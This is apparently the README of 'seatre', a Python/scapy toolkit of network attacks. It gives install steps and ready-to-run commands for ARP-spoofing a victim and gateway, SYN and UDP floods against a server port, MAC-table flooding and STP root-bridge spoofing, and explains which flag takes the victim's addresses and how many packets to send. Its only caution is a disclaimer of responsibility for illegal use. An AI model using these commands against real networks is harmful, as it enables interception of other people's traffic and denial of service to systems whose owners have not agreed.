A collection of scripts that implement different network attacks. For informational purposes only.
Any contributor to this project doesn't take any responsibility for illegal usage of any script from this project.
See the article about how to use it here.
The tested environment:
- Python v3.10
- Ubuntu 22.04 LTS
Make sure that python3-scapy
is installed on your system: sudo apt-get install python3-scapy
You can either run app.py
from a checkout of the code, or install it like any other python project. Keep in mind that a lot of scripts here can be executed only with the root privileges, so you need to run it with sudo.
$ sudo pip3 install seatre
$ sudo seatre
usage: seatre [-h] [--debug] {attack} ...
To enter the debug mode, use the --debug
option after the seatre
command.
To get the attack description in the terminal, enter seatre <attack> --desc
The following commands include the --debug
option, which is not required to execute an attack.
Example usage:
$ sudo seatre --debug arpspoof -i wlp2s0 -m aa:aa:aa:aa:aa:aa -gm BB-BB-BB-BB-BB-BB -gip 192.168.0.1 -vm cc:cc:cc:cc:cc:cc -vip 192.168.0.108
where:
wlp2s0
— your network interfaceaa:aa:aa:aa:aa:aa
— the interface MAC-address (can be written asAA:AA:AA:AA:AA:AA
,AA-AA-AA-AA-AA-AA
andaa-aa-aa-aa-aa-aa
)bb:bb:bb:bb:bb:bb
— the gateway's MAC-address192.168.0.1
— the gateway's IP-addresscc:cc:cc:cc:cc:cc
— the victim's MAC-address192.168.0.108
— the victim's IP-address
Run sudo seatre arpspoof --help
to get more information.
Example usage:
$ sudo seatre --debug synflood -d 172.17.17.10 -p 443 -c 1000
where:
172.17.17.10
— server's IP-address443
— server's port1000
— the number of packets to be sent
Run sudo seatre synflood --help
to get more information.
Example usage:
$ sudo seatre --debug udpflood -d 172.17.17.10 -p 53 -c 1000
where:
172.17.17.10
— server's IP-address53
— server's port1000
— the number of packets to be sent
Run sudo seatre udpflood --help
to get more information.
Example usage:
$ sudo seatre --debug macflood -i wlp2s0 -vm "aa:aa:aa:aa:aa:aa" -c 100000
where:
wlp2s0
— your network interfaceaa:aa:aa:aa:aa:aa
— the victim's MAC-address (can be written asAA:AA:AA:AA:AA:AA
,AA-AA-AA-AA-AA-AA
andaa-aa-aa-aa-aa-aa
)100000
— the number of packets to be sent
Run sudo seatre macflood --help
to get more information.
Example usage:
sudo seatre --debug stpspoof -i wlp2s0 -smac "aa:aa:aa:aa:aa:aa" -dmac "bb:bb:bb:bb:bb:bb" -p 4096
wlp2s0
— your network interfaceaa:aa:aa:aa:aa:aa
— your MAC-addressbb:bb:bb:bb:bb:bb
— victim switch's MAC-address4096
— priority for choosing the root switch (the lower the number, the higher the priority, so make sure it's low enough to become the root). Must be divisible by 4096